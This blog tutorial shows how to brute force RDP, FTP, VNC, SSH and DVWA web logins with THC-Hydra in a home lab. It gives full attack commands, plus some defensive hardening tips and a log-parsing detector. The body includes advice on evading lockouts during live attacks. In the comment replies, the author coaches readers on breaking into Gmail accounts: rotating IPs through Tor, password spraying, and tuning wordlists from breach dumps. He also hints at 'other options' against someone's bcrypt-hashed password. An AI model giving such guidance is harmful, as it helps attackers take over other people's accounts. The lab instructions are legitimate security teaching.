Brute Forcing Passwords with THC-Hydra

What is THC-Hydra?

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. THC (The Hackers Choice) created Hydra for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Installing THC-Hydra

If you are running Kali Linux you will already have a version of Hydra installed. On all other Debian-based Linux operating systems, install it from the repository with:

sudo apt-get install hydra

Or you can download the latest version from THC’s public GitHub development repository: https://github.com/vanhauser-thc/thc-hydra

Start by using git to clone the GitHub repository.

git clone https://github.com/vanhauser-thc/thc-hydra

Next, change into the thc-hydra directory.

cd thc-hydra

Now run the configure script.

./configure

Then build it.

make

And finally install it.

sudo make install

Hydra-GTK

Hydra GTK is a GUI front end for hydra. Because it is only a front end, you must already have THC-Hydra installed. If you are running Kali Linux it will already be pre-installed; everyone else can install it by typing:

sudo apt-get install hydra-gtk

Once installed you will have a new application called xHydra, open this up and you should see a window that looks like this.

For the latest information about the Hydra-GTK project, see its GitHub page: https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk

If you already downloaded hydra from THC’s GitHub repository, you also downloaded the latest version of Hydra-GTK.

Within the thc-hydra folder you downloaded from THC’s GitHub earlier, you should see a folder called hydra-gtk.

cd hydra-gtk/

Before I could compile the source code I had to have the gtk2.0 dependency installed

sudo apt-get install gtk2.0

Once installed I was able to compile the source code as normal.

./configure
make
sudo make install

THC-Hydra’s Help File

Once you have Hydra installed, you can check out its help file by typing hydra -h .

hydra -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
 -R restore a previous aborted/crashed session
 -I ignore an existing restore file (dont wait 10 seconds)
 -S perform an SSL connect
 -s PORT if the service is on a different default port, define it here
 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
 -y disable use of symbols in bruteforce, see above
 -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
 -u loop around users, not passwords (effective! implied with -x)
 -C FILE colon separated "login:pass" format, instead of -L/-P options
 -M FILE list of servers to attack, one entry per line, ':' to specify port
 -o FILE write found login/password pairs to FILE instead of stdout
 -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
 -t TASKS run TASKS number of connects in parallel per target (default: 16)
 -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
 -w / -W TIME waittime for responses (32) / between connects per thread (0)
 -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
 -v / -V / -d verbose mode / show login+pass for each attempt / debug mode 
 -O use old SSL v2 and v3
 -q do not print messages about connection errors
 -U service module usage details
 server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
 service the service to crack (see below for supported protocols)
 OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: postgres sapr3 firebird afp ncp ssh sshkey svn oracle mysql5 and regex support.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
 % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
 % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
 hydra -l user -P passlist.txt ftp://192.168.0.1
 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
 hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
 hydra -l admin -p password ftp://[192.168.0.0/24]/
 hydra -L logins.txt -P pws.txt -M targets.txt ssh

Brute Force / Dictionary Attack

Hydra can run either a dictionary-based attack, where you give it an explicit list of words to try, or a brute force attack, which tries every possible combination of characters. Each has its benefits and drawbacks.

A dictionary attack uses a precompiled list of words, or wordlist. This speeds up the cracking process compared with brute force because the program only runs through each word in the wordlist, but if the password is not in that wordlist the attack will fail.

If you are running Kali you will already have a whole bunch of wordlists to use; just type locate wordlist in a terminal to find their location.

For everyone else not running Kali, you can download some good wordlists from the SkullSecurity.org password wiki. Look for rockyou.txt, as this is what I will be using in my examples below.

If this was a targeted attack against someone you could use something like CUPP (Common User Passwords Profiler) to create a wordlist more specific to the target. It takes birthday, nickname, address, a name of pet, etc. Enter the details you know or what you can find out via social media and it will create a wordlist based on your inputs.

A brute force attack cracks a password by trying every possible combination of characters, so, for example, it will try aaaa, then aaab, aaac, aaad and so on. This considerably increases the time the attack takes but reduces the likelihood of the attack failing.

In hydra, you can use -x to enable the brute force options. These options have their own help file, which you can view by typing hydra -x -h.

hydra -x -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.
  -y         disable the use if the above letters as placeholders

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-
   -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/
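
To put numbers on why exhaustive generation takes so long, and why password length matters when setting policy, here is an added example (not part of the original article or of hydra's code) that models the MIN:MAX:CHARSET syntax from the help text above and counts the candidates it describes. The attempt rate of 4 per second is an assumption chosen for illustration.

```python
import string

# Placeholder characters as described in the "hydra -x -h" help text above.
PLACEHOLDERS = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
}


def parse_spec(spec, literal=False):
    """Parse MIN:MAX:CHARSET. literal=True models -y (no placeholders)."""
    parts = spec.split(":", 2)  # the charset itself may contain ':'
    if len(parts) != 3:
        raise ValueError("expected MIN:MAX:CHARSET")
    lo, hi, charset = int(parts[0]), int(parts[1]), parts[2]
    if lo < 1 or hi < lo or not charset:
        raise ValueError("need 1 <= MIN <= MAX and a non-empty charset")
    chars = set()
    for c in charset:
        # Expand a/A/1 unless -y is modelled; any other character is literal.
        chars.update(c if literal else PLACEHOLDERS.get(c, c))
    return lo, hi, chars


def keyspace(spec, literal=False):
    """Number of candidate passwords the spec describes."""
    lo, hi, chars = parse_spec(spec, literal)
    return sum(len(chars) ** n for n in range(lo, hi + 1))


def worst_case_days(spec, attempts_per_second, literal=False):
    """Days needed to try every candidate at a fixed online attempt rate."""
    return keyspace(spec, literal) / attempts_per_second / 86400


if __name__ == "__main__":
    RATE = 4  # assumed attempts per second, for illustration only
    # The specs below are the examples from the help text above.
    for spec, literal in [("3:5:a", False), ("5:8:A1", False),
                          ("5:5:/%,.-", False), ("3:5:aA1", True)]:
        print(f"{spec:12} -y={literal!s:5} "
              f"candidates={keyspace(spec, literal):>16,} "
              f"worst case={worst_case_days(spec, RATE, literal):,.1f} days")
```

Each extra character of length multiplies the work by the size of the character set, which is why a modest minimum length combined with lockout or rate limiting makes online brute force impractical.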

RDP

To set the scene I have a Windows 2012 server with Remote Desktop setup, running in my virtual lab. The virtual machine has an IP of 192.168.34.16 and one user called administrator.

So let’s fire up hydra with our rockyou wordlist and run this command:

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

-t 4 Sets the number of tasks that run in parallel; in this example I have used 4, which sends 4 logins at a time. RDP does not like too many connections at the same time, so try to keep it at a maximum of 4. It is sometimes worth adding a -w to your command to add a wait between attempts.
-V Verbose; shows on screen which usernames and passwords are being tried as hydra works.
-f Quits once hydra has found a positive username and password match.
-l administrator Uses the username administrator to attempt to log in.
-P rockyou.txt The wordlist that passwords are pulled from.
rdp://192.168.34.16 The service we want to attack and its IP address.

You should see each attempt as it tries to connect to RDP, as pictured below. Because we have used the -f option, hydra will stop once it has found a positive match.

In Event Viewer on the Windows 2012 server with RDP enabled, you will see lots of Event ID 4625 entries in the security log. As you can see below, these give the system admin a lot of information about where the brute force has come from.

If you are the admin of a server whose RDP is being brute forced, you can mitigate this by changing the default port RDP listens on or, if you have a router that allows you to translate ports, this is probably the better option.

If you’re interested in changing the port RDP listens on in a Windows PC start by opening the registry editor (Regedit).

Then locate the following registry sub key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\PortNumber

On the Edit menu, click Modify, and then click Decimal

Type the new port number, and then click OK

Quit the Registry Editor.

Then Restart the Computer.

Once the computer restarts you will be able to connect to it using Remote Desktop Connection as normal but you now need to add a colon (:) then the new port at the end of the address like pictured below.

Another option is to restrict RDP access by telling the Windows firewall which IPs are allowed to connect to the RDP port and which are not. I have already done a tutorial on this; check that out here

FTP

Using the same Windows 2012 server I used for the RDP brute force above I installed the latest version of FileZilla Server, which can be downloaded from their website https://filezilla-project.org/

I’m not going to go into the ins and outs of setting up FileZilla Server; there are plenty of guides for that, just google it. Just know that I set up this FTP server for one user called admin with a password of P@ssw0rd.

Then I run this hydra command in the terminal. Notice I have used a capital -L in this command, which specifies a wordlist containing a list of usernames. Use a lowercase -l if you want to specify a single username.

hydra -t 5 -V -f -L userlist -P passwordlist ftp://192.168.34.16

-t 5 Sets the number of tasks or logins it will try simultaneously. I have gone for 5 here, but remember not to go too high as it may give you false results.
-V Verbose; displays the login and password it tries in the terminal for each attempt.
-f Quits once hydra has found a positive username and password match.
-L userlist The capital -L here means I’m using a wordlist of usernames called userlist; a lowercase -l would specify a single username to try.
-P passwordlist The capital -P here means I’m using a wordlist called passwordlist; a lowercase -p would specify a single password to try.
ftp://192.168.34.16 The service we want to attack and the IP address of the FTP server.

You will see each attempt as it tries all the specified username and password combinations until it either finds a match or runs out of combinations.

As you can see below, every attempt is logged in the FileZilla console; you can also see all 5 login tasks running simultaneously at the bottom.


Within FileZilla, you can enable auto ban to stop a hacker brute forcing the username and password of the FTP. When enabled this blocks the IP address which the hacker is using to login from after a specified amount of failed logins, the default is 10.

Interestingly, hydra just continued to try passwords even though my IP was banned. It went through the whole username and password list and said nothing in the list matched, even though I know the username and password were on that list.

VNC

I have installed VNC server on the Linux Mint box on 192.168.100.155 running in my virtual lab, then added a password of P@ssw0rd to the VNC server. I have a quick rundown on how to set this up in Mint below.

apt-get install vnc4server
vncpasswd
Password:P@ssw0rd
Verify:P@ssw0rd
vncserver

In the past, VNC has been a very insecure program: there is no login name, and any password can be set without having to meet any complexity requirements. That said, newer versions have added a blacklist feature that will block you after 5 failed login attempts.

So for our brute force to work, I have had to switch off the blacklisting feature by running this command on the Linux Mint box.

vncconfig -display :1 -set BlacklistTimeout=0 -set BlacklistThreshold=1000000

This will stop me from blacklisting myself in my test lab. On a live engagement I would suggest increasing the wait time per try in hydra (-W) to anything over 60. If you are attacking an older version of VNC, this blacklisting feature is not enabled by default.

Also, as a little side note, don’t use more than 4 tasks (-t 4) in your command as you may find it gives you some false negatives. Remember there is no username on VNC connections, so we won’t need the -l in our command.

After you have turned off the blacklisting feature run this command in hydra.

hydra -P passwordlist -t 1 -w 5 -f -s 5901 192.168.100.155 vnc -v

-P passwordlist The capital -P here means I’m using a wordlist called passwordlist; a lowercase -p would specify a single password to try.
-t 1 Sets the number of tasks or logins it will try simultaneously. I have gone for 1 here, but remember not to go higher than 4 for brute forcing VNC.
-w 5 Sets the wait time between tries. I have gone for 5 here, but remember to go a lot higher if the blacklisting feature is still enabled. (Hydra’s help output above lists -w as the wait time for responses and -W as the wait between connects per thread.)
-f Quits once hydra has found a positive password match.
-s 5901 Changes the port hydra connects to on the VNC server from the default 5900 to 5901, which is what my VNC server defaulted to.
192.168.100.155 vnc Specifies the IP address of the VNC server and the service we want to attack.
-v Verbose; displays the password it tries in the terminal for each attempt.

Once the command is run you should see an output like this.

As I said above, VNC passwords are notably weak. You should never run a VNC server directly over the internet. The blacklist time-out feature prevents some brute forcing of the passwords, but if you hit the server slowly enough not to get blacklisted it can still be brute forced.

Instead, you should run VNC server on 127.0.0.1 by adding -localhost to the command line:

vncserver -localhost

Then use SSH tunnelling to link a port on your machine to the port on the server.

ssh -L 5901:localhost:5901 user@<ServerIP>

Then while that SSH connection is alive, you can connect your VNC client to the port 5901 on your machine.

If you want more information about SSH tunnelling check out my tutorial all about SSH here

Just before I finish up with brute forcing VNC: you can find the VNC logs in a hidden folder called .vnc in your home folder. The contents of this log will look something like the text below. At points 1: and 2: you can see hydra trying the wrong password, and point 3: is where the password was correct. Interestingly, it does not seem to give the IP address of the PC I am using to brute force it.

1:SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40744 (Authentication failure)
 2: Connections: accepted: 0.0.0.0::40746
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40746 (Authentication failure)
 3: Connections: accepted: 0.0.0.0::40748
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 VNCSConnST: Server default pixel format depth 16 (16bpp) little-endian rgb565
 Connections: closed: 0.0.0.0::40748 (Clean disconnection)
 SMsgWriter: framebuffer updates 0
 SMsgWriter: raw bytes equivalent 0, compression ratio -nan

SSH

To set the scene here, I have got Linux Mint running in my virtual lab on 192.168.100.155 with SSH installed. On the Linux Mint box, I created a user called admin with a password of P@ssword.

I have already done a tutorial on setting up Linux Mint in Virtual Box here

I also have a guide on installing SSH in Linux; check out this tutorial here

OK, so now we have our virtual machine with SSH running on it, we can use this command in hydra to start brute forcing the SSH login.

hydra -l admin -P passwordlist ssh://192.168.100.155 -V

-l admin The small -l here states that I am going to specify a username; use a capital -L if you are going to specify a user list.
-P passwordlist The capital -P here says I’m going to be specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 The service we want to attack and the IP address of the SSH server.
-V Verbose; displays the login and password it tries in the terminal for each attempt.

Once you run this command you should see all the attempts in the terminal, as pictured below. Notice that because I have not added -t to the command, the number of simultaneous logins will be 16, which is the default.

If you are interested, SSH logs access attempts in /var/log/auth.log.

To make this log a bit easier on the eyes, you can use the Linux tail command to display the last x number of lines of your auth.log.

Use the following command to view the last 100 lines of your SSH log.

tail -100 /var/log/auth.log | grep 'sshd'
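
Going a step beyond tail and grep, the following added example (not from the original article) counts failed sshd password attempts per source address and flags any source that logged in successfully after a run of failures. The log lines are constructed samples in the usual OpenSSH auth.log wording, and the threshold of 5 failures is an assumption to tune for your environment.

```python
import re
from collections import defaultdict

# Constructed sample lines (not real logs), in the usual OpenSSH wording.
SAMPLE_LOG = """\
Mar  3 10:15:01 mint sshd[2101]: Failed password for admin from 192.168.100.10 port 40740 ssh2
Mar  3 10:15:01 mint sshd[2102]: Failed password for invalid user test from 192.168.100.10 port 40741 ssh2
Mar  3 10:15:02 mint sshd[2103]: Failed password for admin from 192.168.100.10 port 40742 ssh2
Mar  3 10:15:02 mint sshd[2104]: Failed password for admin from 192.168.100.10 port 40743 ssh2
Mar  3 10:15:03 mint sshd[2105]: Failed password for admin from 192.168.100.10 port 40744 ssh2
Mar  3 10:15:03 mint CRON[2110]: pam_unix(cron:session): session opened for user root
Mar  3 10:15:04 mint sshd[2106]: Failed password for admin from 192.168.100.10 port 40745 ssh2
Mar  3 10:15:05 mint sshd[2107]: Accepted password for admin from 192.168.100.10 port 40746 ssh2
Mar  3 10:20:11 mint sshd[2200]: Failed password for hemp from 192.168.100.20 port 51000 ssh2
Mar  3 10:20:19 mint sshd[2201]: Accepted password for hemp from 192.168.100.20 port 51002 ssh2
"""

# Matches sshd password results, with or without the "invalid user" prefix.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def find_bruteforce_sources(log_text, threshold=5):
    """Return {ip: findings} for sources with at least `threshold` failures.

    findings["accepted_after"] lists accounts that logged in successfully
    from that source once the threshold had already been reached, which is
    the pattern a successful password guess leaves behind.
    """
    stats = defaultdict(
        lambda: {"failures": 0, "users": set(), "accepted_after": []}
    )
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an sshd password event
        entry = stats[m["ip"]]
        if m["result"] == "Failed":
            entry["failures"] += 1
            entry["users"].add(m["user"])
        elif entry["failures"] >= threshold:
            entry["accepted_after"].append(m["user"])
    return {
        ip: {
            "failures": e["failures"],
            "users": sorted(e["users"]),
            "accepted_after": e["accepted_after"],
        }
        for ip, e in stats.items()
        if e["failures"] >= threshold
    }


if __name__ == "__main__":
    for ip, info in find_bruteforce_sources(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failures against {info['users']}")
        for user in info["accepted_after"]:
            print(f"  ALERT: '{user}' logged in after repeated failures")
```

To run it against a real log, pass the contents of /var/log/auth.log to find_bruteforce_sources instead of SAMPLE_LOG.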

To stop someone from brute forcing your SSH password you can turn off Password authentication altogether and enable SSH key authentication. If you are interested in setting up SSH key authentication check out my tutorial on SSH.

Webpage Login

Now, this is where things start to get fun: you can use hydra to brute force webpage logins. To get this to work you need some information about the login page, such as whether it uses a POST or a GET request, before you can construct your command in hydra.

The website login I am going to brute force is DVWA (Damn Vulnerable Web App), which, if you have already taken a look at my tutorial on Setting up a Vulnerable LAMP Server, you will already have set up and ready to go.

Also, you are going to need to have installed some sort of proxy to capture and identify the key parameters of the web login page so we can create our command in hydra. I will be using the Firefox plugin called Tamper Data but you can just as easily use Burp Suite.

The Tamper Data Firefox plugin can be downloaded from https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/

—————Edit: 24th January 2019———————

Tamper Data now no longer works with the latest version of Firefox, check out my new tutorial Brute Forcing Web Logins with DVWA for the same tutorial below but using Burp Suite to capture the requests.

——————————————————————————

So to start, open up the DVWA website in your browser (in my lab I go to http://192.168.100.155/dvwa) and log in to the DVWA site with the default credentials of admin / password.

You can brute force this main login page but it’s a little bit more advanced than what I want to get into here.

Once logged in, go down to DVWA Security button on the left-hand side of the page and make sure the security Level is set to low.

Once the security is set to low click the Brute Force button on the menu on the left-hand side.

This is the login page we are going to brute force.

Start by firing up Tamper Data, I normally do this in Firefox by hitting the alt key on the keyboard and selecting it from the Tools menu.

Now Tamper Data is open click Start Tamper and it will proxy all your Firefox traffic through Tamper Data allowing us to capture the login request.

Now go back to DVWA and enter any old username and password and click Login. Tamper Data will capture the login request and ask you if you want to tamper with it, just click submit.

Go back to Tamper Data and right click the first GET request captured and click copy.

Next, open up any text editor and paste everything that we copied from Tamper Data. This should look something like this:

We have now just got to take note of the message that the DVWA website spits back at us to tell us we have entered a wrong username and password.

We now have everything to construct our hydra command against this login page.

The command should look something like the one below. Notice that all this information was gathered from Tamper Data, and the only part that will be different on yours is the part after PHPSESSID=.

hydra 192.168.100.155 -V -l admin -P passwordlist http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low"

192.168.100.155 The target IP address of the server hosting the webpage.
-V Verbose; displays the login and password it tries in the terminal for each attempt.
-l admin The small -l here states that I am going to specify a username; use a capital -L if you are going to specify a user list.
-P passwordlist The capital -P here says I’m going to be specifying a list of passwords in a file called passwordlist.
http-get-form Tells hydra that you are going to be using the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login All these details were found in the Tamper Data request that we copied to our text editor.
F=Username and/or password incorrect. This is the failed login message we received from the DVWA login page. When hydra does not receive this message in a response, it treats the login as valid.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low This is the cookie we were issued when we logged into the DVWA site at the start, also found in Tamper Data.

If you get an error like the one pictured below, where it gives you more than one valid password, it means that you have not constructed the command correctly and probably just need to check the syntax.

Normally it’s either that the PHPSESSID is wrong or that the failed logon message is not formatted correctly.

If you want more information on hydra’s http-get-form module, take a look at its help page by typing hydra http-get-form -U in your terminal.

Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
All colons that are not option separators should be escaped (see the examples above and below).
You can specify a header without escaping the colons, but that way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
"/login.php:user=^USER^&pass=^PASS^:incorrect"
"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

That’s all I’m going to do for now on brute forcing passwords with THC-Hydra. If there are any more you would like me to show you, or you have some feedback for me, please leave a comment below.

Hemp

IT and security expert with 20+ years of experience. With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

52 thoughts on “Brute Forcing Passwords with THC-Hydra”

    1. Hi Marko Thanks for the comment.

      Get and POST requests are quite similar and if you know how it works with GET you should not have a problem changing the command to http-post-form.

      If you need more information check out Hydra’s help module for http-post-form by typing hydra http-post-form -U into your terminal.

  1. Hi,
    Very nice post and very useful. I have a doubt. I have got the same error as you shown in the last screen shot. “1 of 1 target successfully completed, 12 valid passwords found”.
    I am not sure what is wrong in the command i tried in 2 different ways, both time i have same error

    hydra -l admin -P C:\cirt\wordslist-sample\wordslist.txt 192.168.254.132 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.”

    hydra.exe 192.168.254.132 -l admin -P C:\cirt\wordslist-sample\wordslist.txt http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b4o3p65d7fr6jkfcafa0v9qhm2”

    Can you please help.

    1. Hi Jeff

      Sure, I can help, Hydra can be a right pain to get working right.

      Using your previous example, change the last part of the command that I have highlighted to look like this..

      hydra.exe 192.168.254.132 -l admin -P C:\cirt\wordslist-sample\wordslist.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=b4o3p65d7fr6jkfcafa0v9qhm2; security=low"

  2. Hello,

    I have been working on an adapter running Linux. I know the user name, however I have forgotten the password. So, I have been using hydra 8.6 off of the latest Kali release and I am not getting the response I think I should be getting.

    My command: hydra -s 23 -v -V 4:10:aA1!@#$%^&*()_+ -t16 -m 192.168.15.38 telnet

    Note: I have verified I can ping, telnet to the IP address

    The result: It gives me an [ATTEMPT] 16 times, then [ERROR] signal 15.. then [STATUS]… writes to a restore file…

  3. Hello,

    I am hoping you may be able to help! I have a Linux adapter I am working with and have forgotten the password. I know the user name! I was working with my recent version of Kali and hydra (8.6) and noted this might be a good test/use for the tool.

    I have issued the command: hydra -s 23 -v -V -l user -x 4:10:aA1!@#$%^&*()_+ -t16 -m 192.168.15.38 telnet

    The result: It gives me 16 [ATTEMPT] then shows an [ERROR], writes to a restore file and then proceeds to [STATUS] with no attempts. I do not think this is right. Do you have any suggestions?

    Note: I have double checked I can ping the adapter and telnet to it (and it does not support SSL or FTP). -Thanks in advance

    1. Hi DT thanks for posting your comments above..

      The only thing I can think of is maybe you’re smashing the telnet session with too many tasks at once. Try dropping the number down to 5 and try again. Lose the -s 23, as Hydra already knows it’s port 23 because you have added the command telnet on the end.

      hydra -V -t 5 -l user -x 4:10:aA1!@#$%^&*()_+ -m 192.168.15.38 telnet

      hemp

      1. Hemp,

        Thanks for the ideas! I am going back to the lab to try again. I will post a result when I return.

        Regards

  4. Hemp,

    Thanks for the ideas! I ran the modified command you passed to me and the system returned a segmentation error. I re-examined the man pages and I went option by option. After about a dozen tries… I got it to work, I ended up dropping the wait to 1 (-w 1). Another parameter which I found different… it liked -s 23 (for telnet) instead of IP_ADD:23 or IP_ADD telnet.

    I appreciate the insight to the wait variable.

    Regards -DT

    1. Hey DT thanks for letting me know.
      Hydra can be quite fussy about how you structure your command. A lot of the time you just need to adjust the -w wait and -t tasks for your command. It’s worth starting low, say -t 5, and increasing this until you start getting errors, as by default this is set to 16.

      Hemp

  5. Hi, I don’t want to access the actual website that the password is to, I am just trying to crack it so I know what it is. Is there a simpler way of using the GUI to just brute force (I know this person uses pretty random passwords with various character types) this password? I also noticed that all the passwords from this particular dump started with $2a$08$… is that something that I should leave out or keep in when attempting to ultimately crack.

    1. Hi Jason, thanks for your comment…

      It all depends on what you are trying to brute force but you should be able to use the hydra GUI just the same as the command line.

      That password hash you specified ($2a$08$) is part of a bcrypt hash, which to be truthful is going to be really hard to brute force, and it is probably worth looking into other avenues to get the information you need.

      Hemp

      1. thank you hemp.

        What other methods do you suggest I use? I can’t use social engineering or trojans or anything like that. So I def have to crack it… And I think the password is probably pretty complex… rainbow tables or something?

        1. I think unless you’re a government agency there is no feasible way to crack it…

          but you might have a fighting chance if you have a £10,000 password cracking rig and hashcat, but even this process will probably take 4 years to crack, and by that point they may have already changed it to something else, and the costs to run a rig for that amount of time would be paranormal.

          How come you are after the password so bad?

          Just remember the password is only the key to the gate; there are always other options to climb over the defences…

          Hemp

  6. CAN SOMEONE TYPE THE COMMAND LINE FOR GMAIL? SOMEONE HACKED MY GMAIL. I’M STILL LOGGED ON BUT THEY CHANGED MY PW AND TOOK OFF MY RECOVERY EMAIL. SCARED TO LOG OUT. NEED TO GRAB THE MORON’S PW, REVERT BACK TO MYSELF. I DON’T KNOW THE COMMAND FOR IT

    1. Hi Perry

      My personal advice for your predicament is to speak to Gmail support and see if they can help you out. More than likely you have used the same username and password elsewhere on the internet and that’s how your account has been compromised. You can check this by going to https://haveibeenpwned.com/

      You can’t really use hydra alone to brute force a Gmail account as after 5 failed logins your IP will be blocked…

      You really need to run Hydra through a web proxy or Tor to change your IP address every couple of mins.

      Hemp

  7. I feel really sorry to say that, but hydra is the only tool in Kali Linux and of all git repositories that I treat seriously.
    I’ve no idea what the gemail-hack exists for.
    Even a child knows that it does not work.
    On one condition: if your passwd is in the save function, I mean if it is remembered and saved by your pc, the gemail does not hack gmail but your own pc.
    Best regards
    Waiting for a short reply

    1. Hi Barlomiej thanks for your comment.

      The problem with trying to hack Gmail accounts is that after 5 tries your IP will get blocked. What you need to do is proxy your connection through something like Tor and switch your IP every try or couple of tries. Also, the account will get blocked if you smash the hell out of it, so make sure you are password spraying “lots of user names against a single password”.

      Another thing to look out for is the address you are trying to hack on any hacked database list (https://haveibeenpwned.com/); download the database and check what the user had typed in and adjust your wordlist accordingly.

      Let me know how you get on.

      Hemp

  8. I already have the username & password & IP of the device. What Hydra command can I use to find the Cisco Enable Password or the MD5 hash of it?
    Tks very much.

    1. Hi Vinh

      I have never had to run hydra against anything using Cisco Enabled before but I’m sure the command would be something like

      “hydra -l username -P password_file cisco-enable://Targetname”

      There might actually be more info if you check out hydra’s help file by typing hydra -h in your terminal.

      Let me know how you get on??

      Hemp

  9. Is it possible to make syntax so it uses 3 known fields and 1 password. For example let’s say web form looks like this:
    Username:
    Pin:
    Area(drop down input):
    Password:

